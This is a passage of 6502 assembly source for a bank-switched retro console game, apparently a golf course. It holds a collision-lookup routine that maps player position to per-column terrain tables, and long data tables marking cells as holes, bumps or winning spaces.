0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 33+ANGLE_BACKSLASH dc.b 33+ANGLE_BACKSLASH dc.b 33+ANGLE_BACKSLASH dc.b 32+ANGLE_BACKSLASH dc.b 32+ANGLE_BACKSLASH dc.b 31+ANGLE_BACKSLASH ; 160-141 dc.b 31+ANGLE_BACKSLASH dc.b 30+ANGLE_BACKSLASH dc.b 30+ANGLE_BACKSLASH dc.b 29+ANGLE_BACKSLASH dc.b 28+ANGLE_BACKSLASH dc.b 27+ANGLE_BACKSLASH dc.b 27+ANGLE_BACKSLASH dc.b 26+ANGLE_BACKSLASH dc.b 26+ANGLE_BACKSLASH dc.b 25+ANGLE_BACKSLASH dc.b 25+ANGLE_BACKSLASH dc.b 24+ANGLE_BACKSLASH dc.b 23+ANGLE_BACKSLASH dc.b 22+ANGLE_BACKSLASH dc.b 22+ANGLE_BACKSLASH dc.b 21+ANGLE_BACKSLASH dc.b 0 dc.b 0 dc.b 0 dc.b 35+ANGLE_BACKSLASH ; 180-161 dc.b 35+ANGLE_BACKSLASH dc.b 34+ANGLE_BACKSLASH dc.b 34+ANGLE_BACKSLASH dc.b 33+ANGLE_BACKSLASH dc.b 33+ANGLE_BACKSLASH dc.b 32+ANGLE_BACKSLASH dc.b 32+ANGLE_BACKSLASH dc.b 31+ANGLE_BACKSLASH dc.b 31+ANGLE_PIPE dc.b 31+ANGLE_PIPE dc.b 31+ANGLE_PIPE dc.b 31+ANGLE_SLASH dc.b 32+ANGLE_SLASH dc.b 32+ANGLE_SLASH dc.b 33+ANGLE_SLASH dc.b 33+ANGLE_SLASH dc.b 34+ANGLE_SLASH dc.b 34+ANGLE_SLASH dc.b 35+ANGLE_SLASH dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ;============================== ORG $DFF6 BANKS_AND_VECTORS ;============================== ;##################################################### ;##################################################### ;##################################################### ;### ### ;### Bank 3 below ### ;### ### ;##################################################### ;##################################################### ;##################################################### ;============ org $E000 ;============ JUMP_TABLE org $E018 rorg $F018 ;================= Bank3Code ;================= ; New constants FLAT = %00000000 BUMP = %00000001 HOLE = %00000010 WIN = %00000011 ; Set to a default value LDA #$FF STA CollisionStatusFromTable LDA Player0HPosition ; initial value 78 SEC SBC #16 CLC ADC #3 ; go from bit zero to bit 3 (of 7). LSR LSR ; divide by 4. TAX ; number is 0-31 ; If 0-15, do in this bank ; If 16-31, do in next bank CMP #16 BPL GotoBank4FromBank3 ; Ok, if we fell through to here, we're doing a lookup LDA ProcessTableLSBBank3,X STA ReturnAddress LDA ProcessTableMSBBank3,X STA ReturnAddress+1 ; Get the line LDA Player0VPosition ; initial value 189 SEC IF DEBUG = 1 SBC #1 ELSE SBC #3 ENDIF TAY LDA (ReturnAddress),Y ;=========== BNE FinishedProcessingBank3 ; otherwise, check if we're an edge-case LDA Player0HPosition ; initial value 78 SEC SBC #16 CLC ADC #4 ; go from bit zero to bit 4 (of 7). LSR LSR ; divide by 4. TAX ; number is 0-31 ; If 0-15, do in this bank ; If 16-31, do in next bank CMP #16 BPL GotoBank4FromBank3 ; number is 0-15 for bank4 checks LDA ProcessTableLSBBank3,X STA ReturnAddress LDA ProcessTableMSBBank3,X STA ReturnAddress+1 ; Get the line LDA Player0VPosition ; initial value 189 SEC IF DEBUG = 1 SBC #1 ELSE SBC #3 ENDIF TAY LDA (ReturnAddress),Y FinishedProcessingBank3 ;=========== STA CollisionStatusFromTable JMP Bank2 ;================= ; Test Bank 4 ;================= GotoBank4FromBank3 JMP Bank4 ;================= ProcessTableLSBBank3 ; 1-8 .byte #<Column1Information .byte #<Column2Information .byte #<Column3Information .byte #<Column4Information .byte #<Column5Information .byte #<Column6Information .byte #<Column7Information .byte #<Column8Information ; 9-16 .byte #<Column9Information .byte #<Column10Information .byte #<Column11Information .byte #<Column12Information .byte #<Column13Information .byte #<Column14Information .byte #<Column15Information .byte #<Column16Information ProcessTableMSBBank3 ; 1-8 .byte #>Column1Information .byte #>Column2Information .byte #>Column3Information .byte #>Column4Information .byte #>Column5Information .byte #>Column6Information .byte #>Column7Information .byte #>Column8Information ; 9-16 .byte #>Column9Information .byte #>Column10Information .byte #>Column11Information .byte #>Column12Information .byte #>Column13Information .byte #>Column14Information .byte #>Column15Information .byte #>Column16Information ;================================= ; Column Information organization ;================================= ; Conditions handled (LSB): ; Nothing = %0000 ; Bump = %0001 ; Hole = %0010 ; Winning space = %0011 ; 8 angles ; Conditions handled (MSB): ; Slope = 0-15 ; Slope = UR/UL/DL/DR bump ;================== ; New constants ;FLAT = %00000000 ;BUMP = %00000001 ;HOLE = %00000010 ;WIN = %00000011 Column1Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 140-121 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE Column2Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b BUMP dc.b HOLE dc.b HOLE ; 60-41 dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 140-121 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP ; 180-161 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE Column3Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b BUMP dc.b HOLE ; 60-41 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 140-121 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column4Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b BUMP ; 60-41 dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 140-121 dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column5Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column6Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN ; 60-41 dc.b WIN dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP ; 160-141 dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column7Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN ; 60-41 dc.b WIN dc.b WIN dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column8Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b BUMP dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN ; 60-41 dc.b WIN dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 